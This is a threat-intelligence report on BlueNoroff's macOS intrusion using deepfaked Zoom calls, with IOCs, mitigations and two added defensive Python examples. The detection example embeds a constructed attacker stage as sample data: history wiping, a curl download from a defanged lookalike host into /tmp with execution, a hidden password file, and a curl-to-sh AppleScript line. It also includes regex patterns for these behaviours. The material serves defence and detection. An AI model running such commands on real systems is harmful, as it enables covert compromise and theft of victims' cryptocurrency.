Full Report
The North Korea-aligned threat actor known as BlueNoroff has been observed targeting an employee in the Web3 sector with deceptive Zoom calls featuring deepfaked company executives to trick them into installing malware on their Apple macOS devices. Huntress, which revealed details of the cyber intrusion, said the attack targeted an unnamed cryptocurrency foundation employee, who received a
Analysis Summary
# Threat Actor: BlueNoroff
## Attribution & Identity
**Threat Actor Identification:** BlueNoroff, a threat actor aligned with North Korea.
**Associated Groups/Aliases:** Sub-cluster within the Lazarus Group. Known aliases include Alluring Pisces, APT38, Black Alicanto, Copernicium, Nickel Gladstone, Stardust Chollima, and TA444. DTEX suggests the original APT38 mission has fractured into TraderTraitor (aka Jade Sleet and UNC4899) and CryptoCore (aka CageyChameleon, CryptoMimic, DangerousPassword, LeeryTurtle, and Sapphire Sleet).
## Activity Summary
BlueNoroff was observed targeting an employee in the Web3 sector using sophisticated social engineering via Telegram and deepfaked executives during a Zoom meeting. The goal was to trick the victim into installing malware on their Apple macOS devices by creating a pretext of needing to fix an audio issue during the call. This incident, uncovered by Huntress, is consistent with the group's known focus on financial and cryptocurrency targets for monetary gain supporting the DPRK.
## Tactics, Techniques & Procedures
- **Initial Access/Delivery:** Used Telegram messaging to communicate with the victim and deliver a Calendly link pointing to a fake Zoom domain.
- **Social Engineering:** Employed deepfake technology featuring synthetic personas resembling senior company leadership during a video conference (Zoom meeting).
- **Deceptive Software Installation:** Lured the victim to download a malicious AppleScript (`zoom_sdk_support.scpt`) disguised as a Zoom extension.
- **Malware Staging/Execution:** The AppleScript downloaded a next-stage payload from a remote server and executed a shell script.
- **Anti-Forensics:** Disabled bash history logging and wiped the history of executed commands to avoid detection.
- **System Preparation:** Checked for Rosetta 2 and installed it if absent. Rosetta 2 is Apple's translation layer that lets x86-64 binaries run on Apple silicon, so its absence would prevent the x86-64 implants from running on newer Macs.
- **Persistence/Command & Control:** Established control via multiple backdoors, including a Nim-based primary backdoor and a Go-based backdoor (`Root Troy V4`) capable of running remote AppleScript payloads and shell commands.
- **Loader/Payload Dropping:** Used a C++ binary loader (`InjectWithDyld`) to inject code into running processes and drop subsequent implants on the same host.
- **Data Theft:** Deployed an information stealer (`CryptoBot`) targeting cryptocurrency-related files, and a keylogger (`XScreen`) for monitoring keystrokes, clipboard, and screen activity.
- **Related Campaigns:** The lure pattern (a "fix" that requires the target to run something) resembles other North Korean campaigns such as ClickFake Interview, which uses fake job ads and instructs targets to run malicious commands to resolve a supposed access issue.
## Targeting
- **Sectors:** Web3 sector, cryptocurrency foundations, financial institutions, and cryptocurrency businesses.
- **Geography:** The victim's location is not given. Related campaigns (such as those deploying PylangGhost) have mainly targeted users in India.
- **Victims:** An unnamed cryptocurrency foundation employee was the direct victim referenced in this specific intrusion.
## Tools & Infrastructure
- **Malware Families Used:**
- **Telegram 2:** Nim-based primary backdoor.
- **Root Troy V4:** Fully-featured Go backdoor.
- **InjectWithDyld:** C++ binary loader.
- **Nim implant:** Secondary implant for asynchronous command/response.
- **XScreen:** Objective-C keylogger.
- **CryptoBot:** Go-based information stealer.
- **NetChk:** Binary designed to generate random numbers.
- **Infrastructure (C2, domains, IPs):**
- `support[.]us05web-zoom[.]biz` (for initial payload download)
- `web071zoom[.]us/fix/audio-fv/7217417464` (for second payload fetch)
- `web071zoom[.]us/fix/audio-tr/7217417464` (for second payload fetch)
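Both payload hosts above are Zoom lookalikes (`us05web-zoom[.]biz`, `web071zoom[.]us`) rather than Zoom-owned domains, and the initial link arrived via Calendly and Telegram, where no corporate mail filter saw it. The following is an added triage example (not code from Huntress or the original report) that refangs defanged indicators, extracts the links in a message, and flags any host containing "zoom" whose registrable domain is not on a Zoom allowlist. The allowlist, the two-label approximation of the registrable domain, and the sample message are assumptions; extend the allowlist from your own policy and use a public-suffix list if you need to handle TLDs like `co.uk` correctly.

```python
"""Flag Zoom-lookalike hosts in meeting links (added example, not from the report)."""
import re
from urllib.parse import urlsplit

# Assumption: registrable domains Zoom itself uses for meeting links.
# This is a starting point, not a complete list; extend it from your own allowlist.
ZOOM_DOMAINS = {"zoom.us", "zoom.com"}

URL_RE = re.compile(r"(?:hxxps?|https?)://[^\s<>\"']+")


def refang(text: str) -> str:
    """Turn defanged indicators ('hxxp', '[.]', '(.)') back into parseable URLs."""
    return (text.replace("[.]", ".").replace("(.)", ".")
                .replace("hxxps://", "https://").replace("hxxp://", "http://"))


def registrable_domain(host: str) -> str:
    """Approximate eTLD+1 as the last two labels.

    Assumption: no public-suffix list is available, so two-level public
    suffixes such as co.uk are not handled; plug in a PSL for production use.
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def classify_url(url: str) -> str:
    """Return 'legitimate', 'lookalike', 'unrelated' or 'invalid' for one link."""
    url = refang(url.strip())
    if "://" not in url:
        url = "https://" + url          # bare hosts are still worth checking
    host = urlsplit(url).hostname or ""
    if not host:
        return "invalid"
    if registrable_domain(host) in ZOOM_DOMAINS:
        return "legitimate"
    # Anything that trades on the Zoom brand but is not Zoom-owned,
    # including subdomain tricks like zoom.us.evil.example.
    if "zoom" in host:
        return "lookalike"
    return "unrelated"


def find_suspicious_links(message: str):
    """Extract every link in a chat message and return the lookalikes with their verdict."""
    found = []
    for url in URL_RE.findall(refang(message)):
        verdict = classify_url(url)
        if verdict == "lookalike":
            found.append((url, verdict))
    return found


# Constructed sample message modelled on the lure described above (not the real one).
SAMPLE_MESSAGE = (
    "Booked via https://calendly.com/acme-foundation/30min . Audio still broken? "
    "Grab the SDK fix at https://support[.]us05web-zoom[.]biz/zoom_sdk_support.scpt"
)

if __name__ == "__main__":
    for link, verdict in find_suspicious_links(SAMPLE_MESSAGE):
        print(f"{verdict}: {link}")
```

Run it on the raw text of a Telegram or Slack export before a user follows a "fix" link; the `refang` step also lets you feed it defanged indicator lists straight from a report.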
## Implications
BlueNoroff/Lazarus sub-groups remain highly proactive in targeting the cryptocurrency and Web3 space for financial theft supporting the DPRK. The use of sophisticated social engineering, including high-fidelity deepfakes and targeted remote session manipulation, indicates a willingness to invest heavily in tailoring attacks against high-value remote workers. The multi-stage execution chain and deployment of specialized implants (keylogger, crypto stealer) demonstrate a commitment to comprehensive system compromise and financial exfiltration.
## Mitigations
- **Security Awareness Training:** Train employees, especially remote workers in high-risk areas, to identify social engineering attacks originating from remote meeting software lures or external contacts proposing urgent fixes.
- **Software Verification:** Exercise extreme caution when asked to download software extensions or scripts, even within seemingly legitimate corporate communications (like Zoom meetings). Verify the source independently.
- **Endpoint Detection & Response (EDR):** Implement robust EDR solutions capable of detecting multi-stage execution, unusual shell script behavior (like history disabling), and process injection.
- **Host Monitoring:** Alert on unknown binaries executed from temporary directories (`/tmp`) and on hidden files written there (for example `.pwd`), and on Rosetta 2 installation when it is not part of standard provisioning.
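The shell stage described under Tactics, Techniques & Procedures (history disabling, a conditional Rosetta 2 install, a download into `/tmp` followed by execution, and a hidden `/tmp/.pwd` file) is a compact set of behaviours an EDR rule or a script-content scanner can key on, which is what the EDR and monitoring mitigations above ask for. The following is an added example (not Huntress's detection logic and not the attacker's script) that scores a captured script or command transcript against those behaviours. The rule set, the weights, and the two sample scripts are constructed for illustration; the quarantine-flag rule is a generalization beyond what the page describes, added because `xattr -d com.apple.quarantine` is a common Gatekeeper bypass seen in the same kind of stage.

```python
"""Score a macOS shell/AppleScript stage for the behaviours in the report (added example)."""
import re

# Each rule: (name, weight, compiled regex). Matched line by line.
# Weights are arbitrary assumptions; tune them against your own telemetry.
RULES = [
    ("anti_forensics", 3, re.compile(
        r"unset\s+HISTFILE|HISTFILE=/dev/null|history\s+-c|HISTSIZE=0|set\s+\+o\s+history")),
    ("rosetta_install", 2, re.compile(r"softwareupdate\s+--install-rosetta")),
    # curl piped straight into a shell, or curl writing into /tmp
    ("remote_download_exec", 3, re.compile(
        r"curl\b[^|\n]*\|\s*(?:ba|z)?sh\b|curl\b[^\n]*-o\s*/tmp/\S+")),
    # a /tmp path in command position, or chmod +x on one
    ("exec_from_tmp", 2, re.compile(r"chmod\s+\+x\s+/tmp/\S+|(?:^\s*|[;&|]\s*)/tmp/\S+")),
    ("hidden_tmp_file", 2, re.compile(r"/tmp/\.\w+")),
    # AppleScript handing off to the shell (the .scpt lure's likely pivot point)
    ("applescript_shell", 2, re.compile(r"do\s+shell\s+script")),
    # Generalization not on the page: Gatekeeper quarantine-flag removal.
    ("quarantine_strip", 2, re.compile(r"xattr\s+(?:-\w+\s+)*com\.apple\.quarantine")),
]


def assess(script: str):
    """Return (score, hits) where hits maps rule name -> matching lines."""
    hits = {}
    for line in script.splitlines():
        for name, _weight, rx in RULES:
            if rx.search(line):
                hits.setdefault(name, []).append(line.strip())
    score = sum(weight for name, weight, _ in RULES if name in hits)
    return score, hits


# Constructed stage modelled on the chain described in the report (not the real script).
# The URL is kept defanged on purpose.
STAGE = """#!/bin/bash
unset HISTFILE; export HISTSIZE=0
arch -x86_64 /usr/bin/true 2>/dev/null || softwareupdate --install-rosetta --agree-to-license
curl -s -o /tmp/icloud_helper https://web071zoom[.]us/fix/audio-fv/7217417464
chmod +x /tmp/icloud_helper
/tmp/icloud_helper > /dev/null 2>&1 &
echo "$PW" > /tmp/.pwd
history -c
"""

# Constructed AppleScript line of the kind a zoom_sdk_support.scpt lure might carry.
APPLESCRIPT_LINE = 'do shell script "curl -s https://support[.]us05web-zoom[.]biz/x | sh"'

# Constructed benign installer for comparison.
BENIGN = """#!/bin/bash
set -euo pipefail
brew update && brew upgrade
mkdir -p "$HOME/.config/tool"
cp config.toml "$HOME/.config/tool/"
"""

if __name__ == "__main__":
    for label, text in (("stage", STAGE), ("applescript", APPLESCRIPT_LINE), ("benign", BENIGN)):
        score, hits = assess(text)
        print(f"{label}: score={score} rules={sorted(hits)}")
```

Feed it the body of any script dropped by `osascript` or `curl`, or the reconstructed command line from process telemetry; a single hit such as a Rosetta install is normal on a developer Mac, but the combination of history disabling, a `/tmp` download-and-execute, and a hidden `/tmp` file in one stage is not.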